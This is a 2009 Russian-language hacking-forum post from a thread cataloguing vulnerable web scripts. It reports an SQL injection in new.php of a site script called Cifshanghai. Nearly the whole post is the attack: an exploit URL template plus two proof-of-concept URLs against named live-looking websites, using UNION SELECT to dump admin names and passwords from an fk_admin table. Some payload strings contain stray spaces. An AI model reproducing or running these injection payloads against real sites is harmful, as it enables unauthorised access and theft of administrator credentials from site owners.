Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #7  
Старый 21.05.2009, 20:45
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами: 9010027

Репутация: 308
По умолчанию
Cifshanghai Script

Download: http://www.cifshanghai.com/
Vuln File: new.php
Exploit:
Код:
http://localhost/[path]/new.php?id=[SQL]
POC:
Цитата:
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3 a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(nam e,0x3a,password),8%20from%20fk_admin-
 
Ответить с цитированием